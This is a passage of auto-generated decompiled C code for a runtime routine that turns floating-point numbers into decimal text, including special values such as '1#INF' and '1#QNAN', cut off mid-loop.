                                                				signed int _t812;
                                                				signed int _t817;
                                                				signed int _t825;
                                                				signed int* _t828;
                                                				signed int _t832;
                                                				signed int _t843;
                                                				signed int _t844;
                                                				signed int _t846;
                                                				char* _t847;
                                                				signed int _t850;
                                                				signed int _t854;
                                                				signed int _t855;
                                                				signed int _t860;
                                                				signed int _t862;
                                                				signed int _t867;
                                                				signed int _t876;
                                                				signed int _t879;
                                                				signed int _t881;
                                                				signed int _t884;
                                                				signed int _t885;
                                                				signed int _t886;
                                                				signed int _t889;
                                                				signed int _t902;
                                                				signed int _t903;
                                                				signed int _t905;
                                                				char* _t906;
                                                				signed int _t909;
                                                				signed int _t913;
                                                				signed int _t914;
                                                				signed int* _t916;
                                                				signed int _t919;
                                                				signed int _t921;
                                                				signed int _t926;
                                                				signed int _t934;
                                                				signed int _t937;
                                                				signed int _t941;
                                                				signed int* _t948;
                                                				intOrPtr _t950;
                                                				void* _t951;
                                                				intOrPtr* _t953;
                                                				signed int* _t957;
                                                				unsigned int _t968;
                                                				signed int _t969;
                                                				void* _t972;
                                                				signed int _t973;
                                                				void* _t975;
                                                				signed int _t976;
                                                				signed int _t977;
                                                				signed int _t978;
                                                				signed int _t988;
                                                				signed int _t993;
                                                				signed int _t996;
                                                				unsigned int _t999;
                                                				signed int _t1000;
                                                				void* _t1003;
                                                				signed int _t1004;
                                                				void* _t1006;
                                                				signed int _t1007;
                                                				signed int _t1008;
                                                				signed int _t1009;
                                                				signed int _t1014;
                                                				signed int* _t1019;
                                                				signed int _t1021;
                                                				signed int _t1031;
                                                				void _t1034;
                                                				signed int _t1037;
                                                				void* _t1040;
                                                				signed int _t1047;
                                                				signed int _t1054;
                                                				signed int _t1055;
                                                				signed int _t1058;
                                                				signed int _t1059;
                                                				signed int _t1061;
                                                				signed int _t1062;
                                                				signed int _t1063;
                                                				signed int _t1067;
                                                				signed int _t1071;
                                                				signed int _t1072;
                                                				signed int _t1073;
                                                				signed int _t1075;
                                                				signed int _t1076;
                                                				signed int _t1077;
                                                				signed int _t1078;
                                                				signed int _t1079;
                                                				signed int _t1080;
                                                				signed int _t1082;
                                                				signed int _t1083;
                                                				signed int _t1084;
                                                				signed int _t1085;
                                                				signed int _t1086;
                                                				signed int _t1087;
                                                				unsigned int _t1088;
                                                				void* _t1091;
                                                				intOrPtr _t1093;
                                                				signed int _t1094;
                                                				signed int _t1095;
                                                				signed int _t1096;
                                                				signed int* _t1100;
                                                				void* _t1104;
                                                				void* _t1105;
                                                				signed int _t1106;
                                                				signed int _t1107;
                                                				signed int _t1108;
                                                				signed int _t1111;
                                                				signed int _t1112;
                                                				signed int _t1117;
                                                				signed int _t1119;
                                                				signed int _t1122;
                                                				char _t1127;
                                                				signed int _t1129;
                                                				signed int _t1130;
                                                				signed int _t1131;
                                                				signed int _t1132;
                                                				signed int _t1133;
                                                				signed int _t1134;
                                                				signed int _t1135;
                                                				signed int _t1139;
                                                				signed int _t1140;
                                                				signed int _t1141;
                                                				signed int _t1142;
                                                				signed int _t1143;
                                                				unsigned int _t1146;
                                                				void* _t1150;
                                                				void* _t1151;
                                                				unsigned int _t1152;
                                                				signed int _t1157;
                                                				signed int _t1158;
                                                				signed int _t1160;
                                                				signed int _t1161;
                                                				intOrPtr* _t1163;
                                                				signed int _t1164;
                                                				signed int _t1166;
                                                				signed int _t1167;
                                                				signed int _t1170;
                                                				signed int _t1172;
                                                				signed int _t1173;
                                                				void* _t1174;
                                                				signed int _t1175;
                                                				signed int _t1176;
                                                				signed int _t1177;
                                                				void* _t1180;
                                                				signed int _t1181;
                                                				signed int _t1182;
                                                				signed int _t1183;
                                                				signed int _t1184;
                                                				signed int _t1185;
                                                				signed int* _t1188;
                                                				signed int _t1189;
                                                				signed int _t1190;
                                                				signed int _t1191;
                                                				signed int _t1192;
                                                				intOrPtr* _t1194;
                                                				intOrPtr* _t1195;
                                                				signed int _t1197;
                                                				signed int _t1199;
                                                				signed int _t1202;
                                                				signed int _t1208;
                                                				signed int _t1212;
                                                				void* _t1213;
                                                				signed int _t1217;
                                                				signed int _t1220;
                                                				signed int _t1221;
                                                				signed int _t1222;
                                                				signed int _t1223;
                                                				signed int _t1224;
                                                				signed int _t1225;
                                                				signed int _t1227;
                                                				signed int _t1228;
                                                				signed int _t1229;
                                                				signed int _t1230;
                                                				signed int _t1232;
                                                				signed int _t1233;
                                                				signed int _t1234;
                                                				signed int _t1235;
                                                				signed int _t1236;
                                                				signed int _t1238;
                                                				signed int _t1239;
                                                				signed int _t1241;
                                                				signed int _t1243;
                                                				signed int _t1245;
                                                				signed int _t1247;
                                                				signed int* _t1249;
                                                				signed int* _t1251;
                                                				signed int _t1260;
                                                
                                                				_t724 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t724 ^ _t1247;
                                                				_t1031 = _a20;
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_t1163 = _a16;
                                                				_v1924 = _t1163;
                                                				_v1920 = _t1031;
                                                				E00262AFC( &_v1944, __eflags);
                                                				_t1212 = _a8;
                                                				_t729 = 0x2d;
                                                				if((_t1212 & 0x80000000) == 0) {
                                                					_t729 = 0x120;
                                                				}
                                                				 *_t1163 = _t729;
                                                				 *((intOrPtr*)(_t1163 + 8)) = _t1031;
                                                				_t1164 = _a4;
                                                				if((_t1212 & 0x7ff00000) != 0) {
                                                					L5:
                                                					_t734 = E0025EB0F( &_a4);
                                                					_pop(_t1046);
                                                					__eflags = _t734;
                                                					if(_t734 != 0) {
                                                						_t1046 = _v1924;
                                                						 *((intOrPtr*)(_v1924 + 4)) = 1;
                                                					}
                                                					_t735 = _t734 - 1;
                                                					__eflags = _t735;
                                                					if(_t735 == 0) {
                                                						_push("1#INF");
                                                						goto L308;
                                                					} else {
                                                						_t751 = _t735 - 1;
                                                						__eflags = _t751;
                                                						if(_t751 == 0) {
                                                							_push("1#QNAN");
                                                							goto L308;
                                                						} else {
                                                							_t752 = _t751 - 1;
                                                							__eflags = _t752;
                                                							if(_t752 == 0) {
                                                								_push("1#SNAN");
                                                								goto L308;
                                                							} else {
                                                								__eflags = _t752 == 1;
                                                								if(_t752 == 1) {
                                                									_push("1#IND");
                                                									goto L308;
                                                								} else {
                                                									_v1928 = _v1928 & 0x00000000;
                                                									_a4 = _t1164;
                                                									_a8 = _t1212 & 0x7fffffff;
                                                									_t1260 = _a4;
                                                									asm("fst qword [ebp-0x768]");
                                                									_t1166 = _v1896;
                                                									_v1916 = _a12 + 1;
                                                									_t1054 = _t1166 >> 0x14;
                                                									_t758 = _t1054 & 0x000007ff;
                                                									__eflags = _t758;
                                                									if(_t758 != 0) {
                                                										_t1119 = 0;
                                                										_t758 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										_t1119 = 1;
                                                									}
                                                									_t1167 = _t1166 & 0x000fffff;
                                                									_t1034 = _v1900 + _t758;
                                                									asm("adc edi, esi");
                                                									__eflags = _t1119;
                                                									_t1055 = _t1054 & 0x000007ff;
                                                									_t1217 = _t1055 - 0x434 + (0 | _t1119 != 0x00000000) + 1;
                                                									_v1872 = _t1217;
                                                									E002650B0(_t1055, _t1260);
                                                									_push(_t1055);
                                                									_push(_t1055);
                                                									 *_t1249 = _t1260;
                                                									_t764 = E00267760(E002651C0(_t1167), _t1260);
                                                									_v1904 = _t764;
                                                									__eflags = _t764 - 0x7fffffff;
                                                									if(_t764 == 0x7fffffff) {
                                                										L16:
                                                										__eflags = 0;
                                                										_v1904 = 0;
                                                									} else {
                                                										__eflags = _t764 - 0x80000000;
                                                										if(_t764 == 0x80000000) {
                                                											goto L16;
                                                										}
                                                									}
                                                									_v468 = _t1034;
                                                									__eflags = _t1167;
                                                									_v464 = _t1167;
                                                									_t1037 = (0 | _t1167 != 0x00000000) + 1;
                                                									_v472 = _t1037;
                                                									__eflags = _t1217;
                                                									if(_t1217 < 0) {
                                                										__eflags = _t1217 - 0xfffffc02;
                                                										if(_t1217 == 0xfffffc02) {
                                                											L101:
                                                											_t766 =  *((intOrPtr*)(_t1247 + _t1037 * 4 - 0x1d4));
                                                											_t195 =  &_v1896;
                                                											 *_t195 = _v1896 & 0x00000000;
                                                											__eflags =  *_t195;
                                                											asm("bsr eax, eax");
                                                											if( *_t195 == 0) {
                                                												_t1058 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												_t1058 = _t766 + 1;
                                                											}
                                                											_t767 = 0x20;
                                                											_t768 = _t767 - _t1058;
                                                											__eflags = _t768 - 1;
                                                											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
                                                											__eflags = _t1037 - 0x73;
                                                											_v1865 = _t769;
                                                											_t1059 = _t1058 & 0xffffff00 | _t1037 - 0x00000073 > 0x00000000;
                                                											__eflags = _t1037 - 0x73;
                                                											if(_t1037 != 0x73) {
                                                												L107:
                                                												_t770 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												__eflags = _t769;
                                                												if(_t769 == 0) {
                                                													goto L107;
                                                												} else {
                                                													_t770 = 1;
                                                												}
                                                											}
                                                											__eflags = _t1059;
                                                											if(_t1059 != 0) {
                                                												L126:
                                                												_v1400 = _v1400 & 0x00000000;
                                                												_t224 =  &_v472;
                                                												 *_t224 = _v472 & 0x00000000;
                                                												__eflags =  *_t224;
                                                												E00260330( &_v468, 0x1cc,  &_v1396, 0);
                                                												_t1249 =  &(_t1249[4]);
                                                											} else {
                                                												__eflags = _t770;
                                                												if(_t770 != 0) {
                                                													goto L126;
                                                												} else {
                                                													_t1086 = 0x72;
                                                													__eflags = _t1037 - _t1086;
                                                													if(_t1037 < _t1086) {
                                                														_t1086 = _t1037;
                                                													}
                                                													__eflags = _t1086 - 0xffffffff;
                                                													if(_t1086 != 0xffffffff) {
                                                														_t1235 = _t1086;
                                                														_t1194 =  &_v468 + _t1086 * 4;
                                                														_v1880 = _t1194;
                                                														while(1) {
                                                															__eflags = _t1235 - _t1037;
                                                															if(_t1235 >= _t1037) {
                                                																_t208 =  &_v1876;
                                                																 *_t208 = _v1876 & 0x00000000;
                                                																__eflags =  *_t208;
                                                															} else {
                                                																_v1876 =  *_t1194;
                                                															}
                                                															_t210 = _t1235 - 1; // 0x70
                                                															__eflags = _t210 - _t1037;
                                                															if(_t210 >= _t1037) {
                                                																_t1146 = 0;
                                                																__eflags = 0;
                                                															} else {
                                                																_t1146 =  *(_t1194 - 4);
                                                															}
                                                															_t1194 = _t1194 - 4;
                                                															_t948 = _v1880;
                                                															_t1235 = _t1235 - 1;
                                                															 *_t948 = _t1146 >> 0x0000001f ^ _v1876 + _v1876;
                                                															_v1880 = _t948 - 4;
                                                															__eflags = _t1235 - 0xffffffff;
                                                															if(_t1235 == 0xffffffff) {
                                                																break;
                                                															}
                                                															_t1037 = _v472;
                                                														}
                                                														_t1217 = _v1872;
                                                													}
                                                													__eflags = _v1865;
                                                													if(_v1865 == 0) {
                                                														_v472 = _t1086;
                                                													} else {
                                                														_t218 = _t1086 + 1; // 0x73
                                                														_v472 = _t218;
                                                													}
                                                												}
                                                											}
                                                											_t1170 = 1 - _t1217;
                                                											E002596C0(_t1170,  &_v1396, 0, 1);
                                                											__eflags = 1;
                                                											 *(_t1247 + 0xbad63d) = 1 << (_t1170 & 0x0000001f);
                                                											_t779 = 0xbadbae;
                                                										} else {
                                                											_v1396 = _v1396 & 0x00000000;
                                                											_t1087 = 2;
                                                											_v1392 = 0x100000;
                                                											_v1400 = _t1087;
                                                											__eflags = _t1037 - _t1087;
                                                											if(_t1037 == _t1087) {
                                                												_t1150 = 0;
                                                												__eflags = 0;
                                                												while(1) {
                                                													_t950 =  *((intOrPtr*)(_t1247 + _t1150 - 0x570));
                                                													__eflags = _t950 -  *((intOrPtr*)(_t1247 + _t1150 - 0x1d0));
                                                													if(_t950 !=  *((intOrPtr*)(_t1247 + _t1150 - 0x1d0))) {
                                                														goto L101;
                                                													}
                                                													_t1150 = _t1150 + 4;
                                                													__eflags = _t1150 - 8;
                                                													if(_t1150 != 8) {
                                                														continue;
                                                													} else {
                                                														_t166 =  &_v1896;
                                                														 *_t166 = _v1896 & 0x00000000;
                                                														__eflags =  *_t166;
                                                														asm("bsr eax, edi");
                                                														if( *_t166 == 0) {
                                                															_t1151 = 0;
                                                															__eflags = 0;
                                                														} else {
                                                															_t1151 = _t950 + 1;
                                                														}
                                                														_t951 = 0x20;
                                                														_t1236 = _t1087;
                                                														__eflags = _t951 - _t1151 - _t1087;
                                                														_t953 =  &_v460;
                                                														_v1880 = _t953;
                                                														_t1195 = _t953;
                                                														_t171 =  &_v1865;
                                                														 *_t171 = _t951 - _t1151 - _t1087 > 0;
                                                														__eflags =  *_t171;
                                                														while(1) {
                                                															__eflags = _t1236 - _t1037;
                                                															if(_t1236 >= _t1037) {
                                                																_t173 =  &_v1876;
                                                																 *_t173 = _v1876 & 0x00000000;
                                                																__eflags =  *_t173;
                                                															} else {
                                                																_v1876 =  *_t1195;
                                                															}
                                                															_t175 = _t1236 - 1; // 0x0
                                                															__eflags = _t175 - _t1037;
                                                															if(_t175 >= _t1037) {
                                                																_t1152 = 0;
                                                																__eflags = 0;
                                                															} else {
                                                																_t1152 =  *(_t1195 - 4);
                                                															}
                                                															_t1195 = _t1195 - 4;
                                                															_t957 = _v1880;
                                                															_t1236 = _t1236 - 1;
                                                															 *_t957 = _t1152 >> 0x0000001e ^ _v1876 << 0x00000002;
                                                															_v1880 = _t957 - 4;
                                                															__eflags = _t1236 - 0xffffffff;
                                                															if(_t1236 == 0xffffffff) {
                                                																break;
                                                															}
                                                															_t1037 = _v472;
                                                														}
                                                														__eflags = _v1865;
                                                														_t1088 = _t1087 - _v1872;
                                                														_v472 = (0 | _v1865 != 0x00000000) + _t1087;
                                                														_t1197 = _t1088 >> 5;
                                                														_v1884 = _t1088;
                                                														_t1238 = _t1197 << 2;
                                                														E002596C0(_t1197,  &_v1396, 0, _t1238);
                                                														 *(_t1247 + _t1238 - 0x570) = 1 << (_v1884 & 0x0000001f);
                                                														_t779 = _t1197 + 1;
                                                													}
                                                													goto L128;
                                                												}
                                                											}
                                                											goto L101;
                                                										}
                                                										L128:
                                                										_v1400 = _t779;
                                                										_t1040 = 0x1cc;
                                                										_v936 = _t779;
                                                										__eflags = _t779 << 2;
                                                										E00260330( &_v932, 0x1cc,  &_v1396, _t779 << 2);
                                                										_t1251 =  &(_t1249[7]);
                                                									} else {
                                                										_v1396 = _v1396 & 0x00000000;
                                                										_t1239 = 2;
                                                										_v1392 = 0x100000;
                                                										_v1400 = _t1239;
                                                										__eflags = _t1037 - _t1239;
                                                										if(_t1037 != _t1239) {
                                                											L53:
                                                											_t968 = _v1872 + 1;
                                                											_t969 = _t968 & 0x0000001f;
                                                											_t1091 = 0x20;
                                                											_v1876 = _t969;
                                                											_t1199 = _t968 >> 5;
                                                											_v1872 = _t1199;
                                                											_v1908 = _t1091 - _t969;
                                                											_t972 = E00267740(1, _t1091 - _t969, 0);
                                                											_t1093 =  *((intOrPtr*)(_t1247 + _t1037 * 4 - 0x1d4));
                                                											_t973 = _t972 - 1;
                                                											_t108 =  &_v1896;
                                                											 *_t108 = _v1896 & 0x00000000;
                                                											__eflags =  *_t108;
                                                											asm("bsr ecx, ecx");
                                                											_v1884 = _t973;
                                                											_v1912 =  !_t973;
                                                											if( *_t108 == 0) {
                                                												_t1094 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												_t1094 = _t1093 + 1;
                                                											}
                                                											_t975 = 0x20;
                                                											_t976 = _t975 - _t1094;
                                                											_t1157 = _t1037 + _t1199;
                                                											__eflags = _v1876 - _t976;
                                                											_v1892 = _t1157;
                                                											_t977 = _t976 & 0xffffff00 | _v1876 - _t976 > 0x00000000;
                                                											__eflags = _t1157 - 0x73;
                                                											_v1865 = _t977;
                                                											_t1095 = _t1094 & 0xffffff00 | _t1157 - 0x00000073 > 0x00000000;
                                                											__eflags = _t1157 - 0x73;
                                                											if(_t1157 != 0x73) {
                                                												L59:
                                                												_t978 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												__eflags = _t977;
                                                												if(_t977 == 0) {
                                                													goto L59;
                                                												} else {
                                                													_t978 = 1;
                                                												}
                                                											}
                                                											__eflags = _t1095;
                                                											if(_t1095 != 0) {
                                                												L81:
                                                												__eflags = 0;
                                                												_t1040 = 0x1cc;
                                                												_v1400 = 0;
                                                												_v472 = 0;
                                                												E00260330( &_v468, 0x1cc,  &_v1396, 0);
                                                												_t1249 =  &(_t1249[4]);
                                                											} else {
                                                												__eflags = _t978;
                                                												if(_t978 != 0) {
                                                													goto L81;
                                                												} else {
                                                													_t1096 = 0x72;
                                                													__eflags = _t1157 - _t1096;
                                                													if(_t1157 >= _t1096) {
                                                														_t1157 = _t1096;
                                                														_v1892 = _t1096;
                                                													}
                                                													_t988 = _t1157;
                                                													_v1880 = _t988;
                                                													__eflags = _t1157 - 0xffffffff;
                                                													if(_t1157 != 0xffffffff) {
                                                														_t1158 = _v1872;
                                                														_t1241 = _t1157 - _t1158;
                                                														__eflags = _t1241;
                                                														_t1100 =  &_v468 + _t1241 * 4;
                                                														_v1888 = _t1100;
                                                														while(1) {
                                                															__eflags = _t988 - _t1158;
                                                															if(_t988 < _t1158) {
                                                																break;
                                                															}
                                                															__eflags = _t1241 - _t1037;
                                                															if(_t1241 >= _t1037) {
                                                																_t1202 = 0;
                                                																__eflags = 0;
                                                															} else {
                                                																_t1202 =  *_t1100;
                                                															}
                                                															__eflags = _t1241 - 1 - _t1037;
                                                															if(_t1241 - 1 >= _t1037) {
                                                																_t993 = 0;
                                                																__eflags = 0;
                                                															} else {
                                                																_t993 =  *(_t1100 - 4);
                                                															}
                                                															_t996 = _v1880;
                                                															_t1100 = _v1888 - 4;
                                                															_v1888 = _t1100;
                                                															 *(_t1247 + _t996 * 4 - 0x1d0) = (_t1202 & _v1884) << _v1876 | (_t993 & _v1912) >> _v1908;
                                                															_t988 = _t996 - 1;
                                                															_t1241 = _t1241 - 1;
                                                															_v1880 = _t988;
                                                															__eflags = _t988 - 0xffffffff;
                                                															if(_t988 != 0xffffffff) {
                                                																_t1037 = _v472;
                                                																continue;
                                                															}
                                                															break;
                                                														}
                                                														_t1157 = _v1892;
                                                														_t1199 = _v1872;
                                                														_t1239 = 2;
                                                													}
                                                													__eflags = _t1199;
                                                													if(_t1199 != 0) {
                                                														__eflags = 0;
                                                														memset( &_v468, 0, _t1199 << 2);
                                                														_t1249 =  &(_t1249[3]);
                                                													}
                                                													__eflags = _v1865;
                                                													_t1040 = 0x1cc;
                                                													if(_v1865 == 0) {
                                                														_v472 = _t1157;
                                                													} else {
                                                														_v472 = _t1157 + 1;
                                                													}
                                                												}
                                                											}
                                                											_v1392 = _v1392 & 0x00000000;
                                                											_v1396 = _t1239;
                                                											_v1400 = 1;
                                                											_v936 = 1;
                                                											_push(4);
                                                										} else {
                                                											_t1104 = 0;
                                                											__eflags = 0;
                                                											while(1) {
                                                												__eflags =  *((intOrPtr*)(_t1247 + _t1104 - 0x570)) -  *((intOrPtr*)(_t1247 + _t1104 - 0x1d0));
                                                												if( *((intOrPtr*)(_t1247 + _t1104 - 0x570)) !=  *((intOrPtr*)(_t1247 + _t1104 - 0x1d0))) {
                                                													goto L53;
                                                												}
                                                												_t1104 = _t1104 + 4;
                                                												__eflags = _t1104 - 8;
                                                												if(_t1104 != 8) {
                                                													continue;
                                                												} else {
                                                													_t999 = _v1872 + 2;
                                                													_t1000 = _t999 & 0x0000001f;
                                                													_t1105 = 0x20;
                                                													_t1106 = _t1105 - _t1000;
                                                													_v1888 = _t1000;
                                                													_t1243 = _t999 >> 5;
                                                													_v1876 = _t1243;
                                                													_v1908 = _t1106;
                                                													_t1003 = E00267740(1, _t1106, 0);
                                                													_v1896 = _v1896 & 0x00000000;
                                                													_t1004 = _t1003 - 1;
                                                													__eflags = _t1004;
                                                													asm("bsr ecx, edi");
                                                													_v1884 = _t1004;
                                                													_v1912 =  !_t1004;
                                                													if(_t1004 == 0) {
                                                														_t1107 = 0;
                                                														__eflags = 0;
                                                													} else {
                                                														_t1107 = _t1106 + 1;
                                                													}
                                                													_t1006 = 0x20;
                                                													_t1007 = _t1006 - _t1107;
                                                													_t1160 = _t1243 + 2;
                                                													__eflags = _v1888 - _t1007;
                                                													_v1880 = _t1160;
                                                													_t1008 = _t1007 & 0xffffff00 | _v1888 - _t1007 > 0x00000000;
                                                													__eflags = _t1160 - 0x73;
                                                													_v1865 = _t1008;
                                                													_t1108 = _t1107 & 0xffffff00 | _t1160 - 0x00000073 > 0x00000000;
                                                													__eflags = _t1160 - 0x73;
                                                													if(_t1160 != 0x73) {
                                                														L28:
                                                														_t1009 = 0;
                                                														__eflags = 0;
                                                													} else {
                                                														__eflags = _t1008;
                                                														if(_t1008 == 0) {
                                                															goto L28;
                                                														} else {
                                                															_t1009 = 1;
                                                														}
                                                													}
                                                													__eflags = _t1108;
                                                													if(_t1108 != 0) {
                                                														L50:
                                                														__eflags = 0;
                                                														_t1040 = 0x1cc;
                                                														_v1400 = 0;
                                                														_v472 = 0;
                                                														E00260330( &_v468, 0x1cc,  &_v1396, 0);
                                                														_t1249 =  &(_t1249[4]);
                                                													} else {
                                                														__eflags = _t1009;
                                                														if(_t1009 != 0) {
                                                															goto L50;
                                                														} else {
                                                															_t1111 = 0x72;
                                                															__eflags = _t1160 - _t1111;
                                                															if(_t1160 >= _t1111) {
                                                																_t1160 = _t1111;
                                                																_v1880 = _t1111;
                                                															}
                                                															_t1112 = _t1160;
                                                															_v1892 = _t1112;
                                                															__eflags = _t1160 - 0xffffffff;
                                                															if(_t1160 != 0xffffffff) {
                                                																_t1161 = _v1876;
                                                																_t1245 = _t1160 - _t1161;
                                                																__eflags = _t1245;
                                                																_t1019 =  &_v468 + _t1245 * 4;
                                                																_v1872 = _t1019;
                                                																while(1) {
                                                																	__eflags = _t1112 - _t1161;
                                                																	if(_t1112 < _t1161) {
                                                																		break;
                                                																	}
                                                																	__eflags = _t1245 - _t1037;
                                                																	if(_t1245 >= _t1037) {
                                                																		_t1208 = 0;
                                                																		__eflags = 0;
                                                																	} else {
                                                																		_t1208 =  *_t1019;
                                                																	}
                                                																	__eflags = _t1245 - 1 - _t1037;
                                                																	if(_t1245 - 1 >= _t1037) {
                                                																		_t1021 = 0;
                                                																		__eflags = 0;
                                                																	} else {
                                                																		_t1021 =  *(_v1872 - 4);
                                                																	}
                                                																	_t1117 = _v1892;
                                                																	 *(_t1247 + _t1117 * 4 - 0x1d0) = (_t1021 & _v1912) >> _v1908 | (_t1208 & _v1884) << _v1888;
                                                																	_t1112 = _t1117 - 1;
                                                																	_t1245 = _t1245 - 1;
                                                																	_t1019 = _v1872 - 4;
                                                																	_v1892 = _t1112;
                                                																	_v1872 = _t1019;
                                                																	__eflags = _t1112 - 0xffffffff;
                                                																	if(_t1112 != 0xffffffff) {
                                                																		_t1037 = _v472;
                                                																		continue;
                                                																	}
                                                																	break;
                                                																}
                                                																_t1160 = _v1880;
                                                																_t1243 = _v1876;
                                                															}
                                                															__eflags = _t1243;
                                                															if(_t1243 != 0) {
                                                																__eflags = 0;
                                                																memset( &_v468, 0, _t1243 << 2);
                                                																_t1249 =  &(_t1249[3]);
                                                															}
                                                															__eflags = _v1865;
                                                															_t1040 = 0x1cc;
                                                															if(_v1865 == 0) {
                                                																_v472 = _t1160;
                                                															} else {
                                                																_v472 = _t1160 + 1;
                                                															}
                                                														}
                                                													}
                                                													_v1392 = _v1392 & 0x00000000;
                                                													_t1014 = 4;
                                                													__eflags = 1;
                                                													_v1396 = _t1014;
                                                													_v1400 = 1;
                                                													_v936 = 1;
                                                													_push(_t1014);
                                                												}
                                                												goto L52;
                                                											}
                                                											goto L53;
                                                										}
                                                										L52:
                                                										_push( &_v1396);
                                                										_push(_t1040);
                                                										_push( &_v932);
                                                										E00260330();
                                                										_t1251 =  &(_t1249[4]);
                                                									}
                                                									_t784 = _v1904;
                                                									_t1061 = 0xa;
                                                									_v1912 = _t1061;
                                                									__eflags = _t784;
                                                									if(_t784 < 0) {
                                                										_t785 =  ~_t784;
                                                										_t786 = _t785 / _t1061;
                                                										_v1880 = _t786;
                                                										_t1062 = _t785 % _t1061;
                                                										_v1884 = _t1062;
                                                										__eflags = _t786;
                                                										if(_t786 == 0) {
                                                											L249:
                                                											__eflags = _t1062;
                                                											if(_t1062 != 0) {
                                                												_t825 =  *(0x26dc64 + _t1062 * 4);
                                                												_v1896 = _t825;
                                                												__eflags = _t825;
                                                												if(_t825 == 0) {
                                                													L260:
                                                													__eflags = 0;
                                                													_push(0);
                                                													_v472 = 0;
                                                													_v2408 = 0;
                                                													goto L261;
                                                												} else {
                                                													__eflags = _t825 - 1;
                                                													if(_t825 != 1) {
                                                														_t1073 = _v472;
                                                														__eflags = _t1073;
                                                														if(_t1073 != 0) {
                                                															_t1177 = 0;
                                                															_t1225 = 0;
                                                															__eflags = 0;
                                                															do {
                                                																_t1131 = _t825 *  *(_t1247 + _t1225 * 4 - 0x1d0) >> 0x20;
                                                																 *(_t1247 + _t1225 * 4 - 0x1d0) = _t825 *  *(_t1247 + _t1225 * 4 - 0x1d0) + _t1177;
                                                																_t825 = _v1896;
                                                																asm("adc edx, 0x0");
                                                																_t1225 = _t1225 + 1;
                                                																_t1177 = _t1131;
                                                																__eflags = _t1225 - _t1073;
                                                															} while (_t1225 != _t1073);
                                                															__eflags = _t1177;
                                                															if(_t1177 != 0) {
                                                																_t832 = _v472;
                                                																__eflags = _t832 - 0x73;
                                                																if(_t832 >= 0x73) {
                                                																	goto L260;
                                                																} else {
                                                																	 *(_t1247 + _t832 * 4 - 0x1d0) = _t1177;
                                                																	_v472 = _v472 + 1;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											do {
                                                												__eflags = _t786 - 0x26;
                                                												if(_t786 > 0x26) {
                                                													_t786 = 0x26;
                                                												}
                                                												_t1074 =  *(0x26dbce + _t786 * 4) & 0x000000ff;
                                                												_v1872 = _t786;
                                                												_v1400 = ( *(0x26dbce + _t786 * 4) & 0x000000ff) + ( *(0x26dbcf + _t786 * 4) & 0x000000ff);
                                                												E002596C0(_t1074 << 2,  &_v1396, 0, _t1074 << 2);
                                                												_t843 = E00267820( &(( &_v1396)[_t1074]), 0x26d2c8 + ( *(0x26dbcc + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x26dbcf + _t786 * 4) & 0x000000ff) << 2);
                                                												_t1075 = _v1400;
                                                												_t1251 =  &(_t1251[6]);
                                                												_v1892 = _t1075;
                                                												__eflags = _t1075 - 1;
                                                												if(_t1075 > 1) {
                                                													__eflags = _v472 - 1;
                                                													if(_v472 > 1) {
                                                														__eflags = _t1075 - _v472;
                                                														_t1180 =  &_v1396;
                                                														_t844 = _t843 & 0xffffff00 | _t1075 - _v472 > 0x00000000;
                                                														__eflags = _t844;
                                                														if(_t844 != 0) {
                                                															_t1132 =  &_v468;
                                                														} else {
                                                															_t1180 =  &_v468;
                                                															_t1132 =  &_v1396;
                                                														}
                                                														_v1908 = _t1132;
                                                														__eflags = _t844;
                                                														if(_t844 == 0) {
                                                															_t1075 = _v472;
                                                														}
                                                														_v1876 = _t1075;
                                                														__eflags = _t844;
                                                														if(_t844 != 0) {
                                                															_v1892 = _v472;
                                                														}
                                                														_t1133 = 0;
                                                														_t1227 = 0;
                                                														_v1864 = 0;
                                                														__eflags = _t1075;
                                                														if(_t1075 == 0) {
                                                															L243:
                                                															_v472 = _t1133;
                                                															_t846 = _t1133 << 2;
                                                															__eflags = _t846;
                                                															_push(_t846);
                                                															_t847 =  &_v1860;
                                                															goto L244;
                                                														} else {
                                                															_t1181 = _t1180 -  &_v1860;
                                                															__eflags = _t1181;
                                                															_v1928 = _t1181;
                                                															do {
                                                																_t854 =  *(_t1247 + _t1181 + _t1227 * 4 - 0x740);
                                                																_v1896 = _t854;
                                                																__eflags = _t854;
                                                																if(_t854 != 0) {
                                                																	_t855 = 0;
                                                																	_t1182 = 0;
                                                																	_t1076 = _t1227;
                                                																	_v1888 = 0;
                                                																	__eflags = _v1892;
                                                																	if(_v1892 == 0) {
                                                																		L240:
                                                																		__eflags = _t1076 - 0x73;
                                                																		if(_t1076 == 0x73) {
                                                																			goto L258;
                                                																		} else {
                                                																			_t1181 = _v1928;
                                                																			_t1075 = _v1876;
                                                																			goto L242;
                                                																		}
                                                																	} else {
                                                																		while(1) {
                                                																			__eflags = _t1076 - 0x73;
                                                																			if(_t1076 == 0x73) {
                                                																				goto L235;
                                                																			}
                                                																			__eflags = _t1076 - _t1133;
                                                																			if(_t1076 == _t1133) {
                                                																				 *(_t1247 + _t1076 * 4 - 0x740) =  *(_t1247 + _t1076 * 4 - 0x740) & 0x00000000;
                                                																				_t867 = _t855 + 1 + _t1227;
                                                																				__eflags = _t867;
                                                																				_v1864 = _t867;
                                                																				_t855 = _v1888;
                                                																			}
                                                																			_t862 =  *(_v1908 + _t855 * 4);
                                                																			asm("adc edx, 0x0");
                                                																			 *(_t1247 + _t1076 * 4 - 0x740) =  *(_t1247 + _t1076 * 4 - 0x740) + _t862 * _v1896 + _t1182;
                                                																			asm("adc edx, 0x0");
                                                																			_t855 = _v1888 + 1;
                                                																			_t1076 = _t1076 + 1;
                                                																			_v1888 = _t855;
                                                																			_t1182 = _t862 * _v1896 >> 0x20;
                                                																			_t1133 = _v1864;
                                                																			__eflags = _t855 - _v1892;
                                                																			if(_t855 != _v1892) {
                                                																				continue;
                                                																			} else {
                                                																				goto L235;
                                                																			}
                                                																			while(1) {
                                                																				L235:
                                                																				__eflags = _t1182;
                                                																				if(_t1182 == 0) {
                                                																					goto L240;
                                                																				}
                                                																				__eflags = _t1076 - 0x73;
                                                																				if(_t1076 == 0x73) {
                                                																					goto L258;
